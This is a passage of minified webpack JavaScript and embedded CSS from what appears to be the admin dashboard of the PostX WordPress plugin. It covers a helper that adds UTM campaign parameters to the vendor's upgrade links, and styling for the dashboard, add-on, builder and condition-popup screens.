-dashboard"},dc:{source:"db-postx-editor",medium:"acf-pro",campaign:"postx-dashboard"},postx_dashboard_settings:{source:"db-postx-setting",medium:"upgrade-pro-sidebar",campaign:"postx-dashboard"},postx_dashboard_tutorials:{source:"db-postx-tutorial",medium:"tutorials-upgrade_to_pro",campaign:"postx-dashboard"},postx_dashboard_tutorialsdocs:{source:"db-postx-tutorial",medium:"tutorials-doc",campaign:"postx-dashboard"},menu_save_temp_pro:{source:"db-postx-save-template",medium:"popup-upgrade",campaign:"postx-dashboard"},settingsFR:{source:"db-postx-setting",medium:"settings-upgrade-pro",campaign:"postx-dashboard"},tutorialsFR:{source:"db-postx-tutorial",medium:"tutorials-FR",campaign:"postx-dashboard"},editor_darklight:{source:"db-postx-editor",medium:"darklight-pro",campaign:"postx-dashboard"},final_hour_sale:{source:"db-postx-hellobar",medium:"final-hour-sale",campaign:"postx-dashboard"},massive_sale:{source:"db-postx-hellobar",medium:"massive-sale",campaign:"postx-dashboard"},flash_sale:{source:"db-postx-hellobar",medium:"flash-sale",campaign:"postx-dashboard"},exclusive_deals:{source:"db-postx-hellobar",medium:"exclusive-deals",campaign:"postx-dashboard"},black_friday_sale:{source:"db-postx-hellobar",medium:"black-friday",campaign:"postx-dashboard"},new_year_sale:{source:"db-postx-hellobar",medium:"new-year-sale",campaign:"postx-dashboard"}},r=e=>{const{url:t,utmKey:n,affiliate:r,hash:o}=e,i=new URL(t||"https://www.wpxpo.com/postx/"),l=a[n];return l&&(i.searchParams.set("utm_source",l.source),i.searchParams.set("utm_medium",l.medium),i.searchParams.set("utm_campaign",l.campaign)),r&&i.searchParams.set("ref",r),o&&(i.hash=o.startsWith("#")?o:`#${o}`),i.toString()}},6511:(e,t,n)=>{"use strict";n.d(t,{Z:()=>u});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o),l=n(1667),s=n.n(l),p=new URL(n(4975),n.b),c=i()(r()),d=s()(p);c.push([e.id,`.ultp-gettingstart-message{display:grid;grid-template-columns:440px auto;gap:30px;align-items:center;justify-content:space-between}@media only screen and (max-width: 1200px){.ultp-gettingstart-message{grid-template-columns:1fr 1fr}}.ultp-gettingstart-message .ultp-start-left{position:relative;line-height:0;height:100%}.ultp-gettingstart-message .ultp-start-left img{width:100%;height:100%;border-radius:4px}@media only screen and (max-width: 1400px){.ultp-gettingstart-message .ultp-start-left img{object-fit:cover}}.ultp-gettingstart-message .ultp-start-left .ultp-start-content{position:absolute;flex-direction:column;gap:20px;display:flex;bottom:24px;left:24px;line-height:normal}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-text{color:#fff;font-size:18px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns{display:flex;align-items:center;flex-wrap:wrap;gap:12px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-primary-button,.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button{padding:10px 20px;font-size:14px;border-radius:4px}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button{background:unset;border:1px solid #fff;color:#fff !important;font-weight:600}.ultp-gettingstart-message .ultp-start-left .ultp-start-content .ultp-start-btns .ultp-secondary-button:hover{background:unset}.ultp-gettingstart-message .ultp-start-right{display:grid;grid-template-columns:1fr 1fr;height:100%}@media only screen and (max-width: 1200px){.ultp-gettingstart-message .ultp-start-right{grid-template-columns:1fr}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content{background:#fff;padding:24px 32px;border-radius:0 4px 4px 0;display:flex;flex-direction:column;justify-content:center}@media only screen and (min-width: 1200px)and (max-width: 1360px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content{padding:24px 15px}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-title{color:#091f36;font-size:16px;font-weight:600;margin-bottom:8px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-title._pro{font-size:20px;margin-bottom:12px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description{margin-bottom:22px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description._pro{color:#070707;margin-bottom:32px}@media only screen and (min-width: 1200px)and (max-width: 1300px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-description{display:none}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists{display:flex;flex-direction:column;gap:5px;margin-bottom:22px}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists .ultp-list{display:flex;align-items:center;gap:7px;color:#070707;font-weight:500;font-size:14px}@media only screen and (min-width: 1200px)and (max-width: 1300px){.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-lists .ultp-list{font-size:12px}}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-upgrade-btn{background:linear-gradient(180deg, #ea5e40, transparent) #e36f16;padding:12px 25px;border-radius:4px;font-size:14px;margin-bottom:15px;display:flex;align-items:center;gap:10px;width:fit-content;cursor:pointer;text-decoration:none;color:#fff}.ultp-gettingstart-message .ultp-start-right .ultp-dashboard-content .ultp-upgrade-btn:hover{background:linear-gradient(180deg, #e36f16, transparent) #ea5e40}.ultp-gettingstart-message .ultp-dashborad-banner{width:100%;position:relative;line-height:0}@media only screen and (max-width: 1200px){.ultp-gettingstart-message .ultp-dashborad-banner{display:none}}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container{max-width:25%;position:absolute;left:0;right:0;top:0;bottom:0;margin:auto;max-height:fit-content;cursor:pointer;height:fit-content}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container .ultp-play-icon{max-width:100%}.ultp-gettingstart-message .ultp-dashborad-banner .ultp-play-icon-container .ultp-animate{-webkit-animation:pulse 1.2s ease infinite;animation:pulse 1.2s ease infinite;background:var(--postx-primary-color);position:absolute;width:100%;height:100%;left:0;right:0;top:0;bottom:0;margin:auto;border-radius:100%}.ultp-gettingstart-message .ultp-dashborad-banner img.ultp-banner-img{max-width:100%;height:100%;border-radius:4px 0 0 4px}@media only screen and (max-width: 1420px){.ultp-gettingstart-message .ultp-dashborad-banner img.ultp-banner-img{object-fit:cover}}@-webkit-keyframes pulse{0%{opacity:0;transform:scale(1, 1)}50%{opacity:.3}100%{transform:scale(1.5);opacity:0}}@keyframes pulse{0%{opacity:0;transform:scale(1, 1)}50%{opacity:.3}100%{transform:scale(1.5);opacity:0}}.ultp-dashboard-addons-container{display:flex;flex-direction:column;gap:50px}.ultp-dashboard-addons-container .ultp-addon-parent-heading.mt{margin-top:50px}.ultp-dashboard-addons-container .ultp-addon-parent-heading{margin-bottom:32px;color:#070707;font-size:24px;font-weight:600}.ultp-dashboard-addons-container .ultp-addon-parent-heading>span{color:var(--postx-primary-color)}.ultp-dashboard-addons-container .ultp-addons-grid{display:grid;justify-content:space-between;grid-template-columns:1fr 1fr;gap:30px;position:relative}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item{display:flex;flex-direction:column;justify-content:space-between;padding:unset !important;position:relative;overflow:hidden;border:1px solid #e6e6e6;border-radius:8px;background:#fbfbfb}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item img{height:24px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .dashicons{height:unset;width:unset;line-height:unset;font-size:16px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-new-tag{font-weight:500;font-size:10px;color:#070707;padding:4px 8px;background:#ffbd42;border-radius:24px;padding:4px 8px;height:fit-content;line-height:10px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-shortcode-copy{cursor:copy}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents{padding:24px;position:relative}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name{display:flex;gap:12px;align-items:center;margin-bottom:16px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name .name{font-size:20px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-addon-item-name .ultp-addon-item-title{font-weight:500;display:flex;align-items:center;gap:8px;line-height:24px}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock{position:absolute;top:0;left:0}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock span{position:absolute;top:4px;left:2px;font-weight:600;font-size:12px;transform:rotate(315deg);color:#fff}.ultp-dashboard-addons-container .ultp-addons-grid .ultp-addon-item .ultp-addon-item-contents .ultp-pro-lock::after{content:"";width:42px;height:42px;background-image:url(${d});display:block}.ultp-dashboard-addons-container .ultp-addons-container-grid{display:grid;grid-template-columns:auto 360px;gap:32px}.ultp-dashboard-addons-container .ultp-addons-container-grid.ultp-gs{display:block}.ultp-dashboard-addons-container .ultp-addons-container-grid .ultp-addons-items{display:flex;gap:32px;flex-direction:column}.ultp-dashboard-addons-container .ultp-addon-item-actions{display:flex;align-items:center;justify-content:space-between;padding:16px 24px;border-top:1px solid #eaedf2}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action{display:flex;justify-content:space-between;align-items:center;gap:6px}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip{display:flex;align-items:center;text-decoration:none;gap:6px;border:1px solid #e6e6e6;padding:2px 6px;color:#6e6e6e;font-size:14px;font-weight:500;border-radius:4px;transition:400ms}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip svg{width:14px;height:14px}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .ultp-option-tooltip:hover{color:#070707;font-weight:500;border:1px solid #070707}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .dashicons,.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action a{font-size:14px;color:#575a5d;cursor:pointer}.ultp-dashboard-addons-container .ultp-addon-item-actions>.ultp-docs-action .dashicons-admin-collapse{transform:rotate(180deg)}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting{position:relative;height:20px !important;width:20px !important;margin-left:10px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting svg{color:#6e6e6e;cursor:pointer;opacity:1}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting svg:hover{color:#070707}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-popup-setting::before{position:absolute;left:-12px;font-size:30px;top:-13px;border-left:1px solid #eaedf2;padding-left:9px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings{width:150%;height:100vh;background-color:rgba(0,0,0,.5);position:fixed;top:0%;right:10%;transition:.5s;z-index:999}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup{height:100%;width:600px;position:fixed;z-index:99;top:32px;right:0px;margin:0 auto;border-radius:4px;box-sizing:border-box;background-color:var(--postx-white-color);box-shadow:0 1px 2px 0 rgba(8,68,129,.2);overflow-x:hidden;transition:.5s}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup::-webkit-scrollbar{display:none}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-addon-settings-title{padding:15px 20px;background:#e3f1ff;position:sticky;top:0;z-index:1}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form{display:flex;flex-direction:column;justify-content:space-between;height:100%;position:relative}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-body{position:relative;padding:40px 40px 30px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer{text-align:center;background:#e3f1ff;padding:16px;position:sticky;bottom:32px}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer .onloading{cursor:no-drop}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addon-settings-footer .onloading svg{height:14px;width:14px;vertical-align:middle;margin-left:4px;animation:ultp-spin 1s linear infinite;color:#fff}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup form .ultp-addons-setting-save{color:var(--postx-white-color);cursor:pointer;width:600px;border:none;position:fixed;right:0;bottom:0;padding:10px 25px;background:var(--postx-primary-color)}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close{position:fixed;top:40px;right:11px;color:var(--postx-white-color);font-size:25px;cursor:pointer;border:none;padding:0px 9px 3px;background-color:var(--postx-dark-color);z-index:99}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close::after{content:"×"}.ultp-dashboard-addons-container .ultp-addon-item-actions .ultp-addon-settings .ultp-addon-settings-popup .ultp-popup-close:hover{background:red}.addons_promotions{margin-top:40px;border:1px solid #b9cff0;background-color:#e0ecff;padding:30px;border-radius:4px;text-align:center;font-size:16px;color:#091f36}.addons_promotions.ultp-gs{max-width:80%;margin-left:auto;margin-right:auto}.addons_promotions .addons_promotions_label{line-height:20px;font-size:16px}.addons_promotions .addons_promotions_btns{display:flex;flex-wrap:wrap;justify-content:center;gap:12px;margin-top:15px}.addons_promotions .addons_promotions_btns .addons_promotions_btn{padding:6px 12px;border-radius:4px;cursor:pointer;font-size:12px}.addons_promotions .addons_promotions_btns .addons_promotions_btn.btn1{background:#07cc92;color:#fff;text-decoration:none}.addons_promotions .addons_promotions_btns .addons_promotions_btn.btn2{background:#fff;color:#000;text-decoration:none}.ultp_dash_key_features{margin-top:60px;margin-bottom:30px}.ultp_dash_key_features .ultp_dash_key_features_content{display:grid;grid-template-columns:repeat(4, 1fr);gap:20px;margin-top:30px}.ultp_dash_key_features .ultp_dash_key_features_label{font-size:18px;font-weight:600;margin-bottom:10px;color:#091f36}.ultp_dash_key_features .ultp-description{font-size:14px}.ultp-description{color:#4a4a4a;font-size:14px}.ultp-description-notice{margin-top:5px;color:#e68429}.ultp-plugin-required{font-size:14px;text-align:center;display:inline-block;padding:20px 0px 0;color:var(--postx-warning-button-color);margin-top:-16px}@media only screen and (max-width: 1200px){.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp_dash_key_features .ultp_dash_key_features_content{grid-template-columns:1fr 1fr 1fr}}@media only screen and (max-width: 1100px){.ultp-dashboard-addons-container .ultp-addons-container-grid{grid-template-columns:auto}.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 768px){.ultp-dashboard-addons-container .ultp-addons-container-grid{grid-template-columns:auto}.addons_promotions.ultp-gs{max-width:100%}.ultp-gettingstart-message{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid{grid-template-columns:1fr}.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(2, 1fr)}.ultp_dash_key_features .ultp_dash_key_features_content{grid-template-columns:1fr}}@media only screen and (max-width: 425px){.ultp-dashboard-addons-container .ultp-addons-grid.ultp-gs{grid-template-columns:repeat(1, 1fr)}}.ultp-addon-group{background:#fff;border-radius:8px;padding:32px}`,""]);const u=c},3038:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-dashboard-blocks-container{display:flex;flex-direction:column;gap:50px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .frequency{margin-bottom:0px !important}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{margin-top:20px;display:grid;gap:30px;grid-template-columns:1fr 1fr 1fr}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item{display:flex;justify-content:space-between;padding:20px 15px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-item-meta{display:flex;gap:10px;align-items:center;font-size:16px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-item-meta img{height:25px;width:25px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option{display:flex;align-items:center;gap:10px}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option a{text-decoration:none}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option .ultp-option-tooltip{display:flex;align-items:center;text-decoration:none;gap:3px;font-size:14px;color:#575a5d}.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks .ultp-dashboard-group-blocks-item .ultp-blocks-control-option .ultp-option-tooltip .dashicons{height:unset;width:unset;line-height:unset;font-size:14px;color:#575a5d}@media only screen and (max-width: 1350px){.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{grid-template-columns:1fr 1fr}}@media only screen and (max-width: 990px){.ultp-dashboard-blocks-container .ultp-dashboard-blocks-group .ultp-dashboard-group-blocks{grid-template-columns:1fr}}",""]);const l=i},725:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-builder-dashboard__content{width:100%;margin:0;display:grid;grid-template-columns:200px 1fr}.ultp-builder-dashboard__content .ultp-builder-tab__content{display:flex;flex-direction:column;justify-content:flex-start}.ultp-builder-dashboard__content .ultp-builder-tab__content .ultp-tab__content{height:100%}.ultp-builder-tab__option{background:#edf6ff;border:1px solid rgba(3,127,255,.03);min-height:100vh;border-radius:4px 0 0 4px}.ultp-builder-tab__option ul{padding:0px;margin:0px}.ultp-builder-tab__option ul li{font-size:14px;cursor:pointer;color:#091f36;padding:12px 0px 12px 30px;display:flex;align-items:center;transition:400ms}.ultp-builder-tab__option ul li.active,.ultp-builder-tab__option ul li.active *{color:var(--postx-primary-color);background-color:var(--postx-white-color)}.ultp-builder-tab__option ul li:hover,.ultp-builder-tab__option ul li:hover *{color:var(--postx-primary-color)}.ultp-builder-tab__option ul li img{margin-right:8px;height:20px;text-align:left}.ultp-builder-tab__option ul li span{margin-right:8px;font-size:24px;text-align:left;display:block;line-height:1;height:auto}.ultp-builder-tab__option ul ul li{padding-left:50px}.ultp-builder-tab__option .ultp-popup-sync{font-size:14px;cursor:pointer;display:flex;align-items:center;transition:400ms;padding:12px 0px 12px 30px;margin-bottom:0}.ultp-builder-tab__option .ultp-popup-sync i{margin-right:4px;font-size:25px;height:auto;width:auto}.ultp-builder-tab__option .ultp-popup-sync:hover,.ultp-builder-tab__option .ultp-popup-sync:hover *{color:var(--postx-primary-color)}.ultp-builder-tab__content .ultp-builder-tab__heading{display:flex;align-items:center;justify-content:space-between;padding:0 0 20px 30px;max-height:30px}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title .heading{display:inline-block;font-size:18px;text-transform:capitalize}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title span{margin-right:20px;padding-right:20px;border-right:1px solid #575a5d;font-size:18px;cursor:pointer;color:#575a5d}.ultp-builder-tab__content .ultp-builder-tab__heading .ultp-builder-heading__title span svg{height:12px;width:14px;color:#575a5d;margin-right:5px}.ultp-builder-tab__content .ultp-tab__content{display:none !important;opacity:0;transition:.3s;padding:30px;background:var(--postx-white-color);border-radius:0 4px 4px 0;box-shadow:0 1px 2px 0 rgba(8,68,129,.2)}.ultp-builder-tab__content .ultp-tab__content.active{display:block !important;opacity:100;transition:.3s}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab{display:flex;flex-direction:column;gap:20px}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper{background:#f6f8fa;padding:15px 20px 15px 20px;border-radius:4px;border:solid 1px #eaedf2}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading{display:flex;align-items:center;flex-wrap:wrap;gap:15px;justify-content:space-between}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta{display:flex;gap:15px;color:#172c41}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta>div{font-size:14px;font-weight:normal;margin:0px !important}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__meta>div>span{font-weight:600;text-transform:capitalize}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__content div{display:flex;align-items:center;justify-content:space-between}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control{display:flex;gap:12px;position:relative;min-height:26px;align-items:center}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a{text-decoration:none;font-size:13px;color:#575a5d;display:flex;align-items:center;justify-content:center;text-transform:capitalize}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a span{font-size:12px;color:#091f36;height:auto}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control a.status{min-width:56px}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-dashboard__action{line-height:1.2;cursor:pointer}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-action__active{position:absolute;top:52px;cursor:pointer;right:-20px;padding:10px 36px;background:#f9f9f9;box-shadow:4px 6px 12px -10px #000;z-index:9999}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-builder-action__active .dashicons{font-size:18px;top:3px;position:relative}.ultp-builder-tab__content .ultp-tab__content .ultp-template-list__tab .ultp-template-list__wrapper .ultp-template-list__heading .ultp-template-list__control .ultp-condition__edit{padding:5px 10px;border-radius:2px;font-size:12px;border:none;color:#fff;cursor:pointer;background-color:#091f36}.ultp-builder-tab__content .ultp-builder-items{display:grid;gap:30px;grid-template-columns:1fr 1fr 1fr}.ultp-builder-tab__content .ultp-builder-items .newScreen{border-radius:4px;border:solid 1px #eaedf2;background-color:#fff}.ultp-builder-tab__content .ultp-builder-items .newScreen .listInfo{padding:8px 12px;border-bottom:solid 1px #eaedf2;text-transform:capitalize;margin-bottom:12px}.ultp-builder-tab__content .ultp-builder-items .newScreen .listInfo .ultp_h6{font-size:16px;font-weight:500}.ultp-builder-tab__content .ultp-builder-items .newScreen .listOverlays{height:250px}.ultp-builder-tab__content .ultp-builder-items .newScreen .listOverlays img{height:100%;object-fit:fill}.premadeScreen .ultp-item-list{border-radius:4px;border:solid 1px #eaedf2;background-color:#fff}.premadeScreen .ultp-item-list .listInfo{padding:10px;display:flex;justify-content:space-between;align-items:center;border-bottom:solid 1px #eaedf2;text-transform:capitalize;flex-wrap:wrap;row-gap:10px}.premadeScreen .ultp-item-list .listInfo .title{font-size:14px;color:#091f36;font-weight:500}.premadeScreen .ultp-item-list .listInfo .title .parent{font-weight:400;font-size:12px;color:rgba(9,31,54,.67)}.premadeScreen .ultp-item-list .listInfo .btnImport{display:flex;align-items:center;border-radius:4px;background-image:linear-gradient(#18dd5c, #0c8d20);padding:5px 10px;color:#fff;font-size:12px}.premadeScreen .ultp-item-list .listInfo .btnImport svg{height:12px;color:#fff;margin-right:6px}.premadeScreen .ultp-item-list .listInfo .btnImport span{color:#fff}.premadeScreen .ultp-item-list .listInfo .ultp-upgrade-pro-btn{font-size:12px;padding:5px 10px}.premadeScreen .ultp-item-list .listOverlay{box-sizing:border-box;position:relative;line-height:0;padding:10px}.premadeScreen .ultp-item-list .listOverlay img{border-radius:4px}.premadeScreen.ultp-builder-items.ultpheader .bg-image-aspect,.premadeScreen.ultp-builder-items.ultpfooter .bg-image-aspect{aspect-ratio:1.8}.premadeScreen.ultp-builder-items.ultpheader .ultp-list-blank-img img,.premadeScreen.ultp-builder-items.ultpfooter .ultp-list-blank-img img{max-height:190px}.premadeScreen.ultp-builder-items.ultpheader .dashicons-visibility,.premadeScreen.ultp-builder-items.ultpfooter .dashicons-visibility{font-size:50px}.ultp-builder-items .ultp-item-list img{width:100%;max-width:100%}.ultp-item-list{position:relative}.ultp-premade-item{transition:.3s}.ultp-premade-item:hover{box-shadow:1px 4px 18px -12px #000}.ultp-list-white-overlay{cursor:pointer;font-weight:600;width:100%;height:100%;justify-content:center;align-items:center;top:0;left:0;position:absolute;display:flex;align-items:center;color:var(--postx-primary-color);font-size:12px}.ultp-list-white-overlay .dashicons{margin-right:15px;font-size:32px;display:block;height:auto;color:var(--postx-primary-color)}.ultp-condition-wrapper{z-index:100000;position:fixed;top:0;left:0;width:100%;height:100%;display:flex;justify-content:center;align-items:center;background:rgba(0,0,0,.7)}.ultp-condition-wrapper .ultp-condition-popup{max-width:700px;width:100%;position:relative;background:#fff;padding:40px 60px;border-radius:4px;height:fit-content;max-height:90%;overflow:unset !important;margin:50px auto 0}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close{position:absolute;top:0;right:-52px;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff;transition:400ms}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close svg{color:#000}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close:hover{background:red}.ultp-condition-wrapper .ultp-condition-popup .ultp-save-close:hover svg{color:#fff}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content{display:flex;gap:30px;align-items:center;justify-content:center;flex-wrap:wrap;position:relative}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap{height:450px;width:100%;display:flex;flex-direction:column;align-items:center;overflow-y:scroll !important;-ms-overflow-style:none;scrollbar-width:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap-heading{margin-bottom:14px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap::-webkit-scrollbar{display:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-items{width:600px;margin-top:20px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .btnCondition{margin-top:20px;color:#fff;border-radius:4px;background-color:#091f36;padding:8px 16px;border:none;cursor:pointer}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition_cancel{cursor:pointer;position:absolute;right:-30px;color:#de1010;font-size:24px;line-height:.7;transition:400ms}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition_cancel:hover{color:#c00a0a}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields,.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap__field{display:flex;align-items:center;position:relative;width:100%}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-wrap__field{background:#fff;margin-top:15px;border:1px solid #eaedf2;border-radius:2px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields{padding:0px}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields select{color:#575a5d;border:none;margin-right:0;padding-top:7px;padding-bottom:7px;border-right:1px solid #eaedf2;border-radius:0}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-fields select:last-child{border-right:none;width:100%;max-width:100%}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__label{display:inline-flex;align-items:center;background:#7c8084;padding:4px 8px;border-radius:2px;color:#fff}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown__label::-webkit-scrollbar{display:none}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown{text-align:left;width:100%;display:flex;align-items:center;position:relative}.ultp-condition-wrapper .ultp-condition-popup .ultp-modal-content .ultp-condition-wrap .ultp-condition-dropdown .ultp-condition-text{width:100%;display:inline-flex;padding:0 10px 0 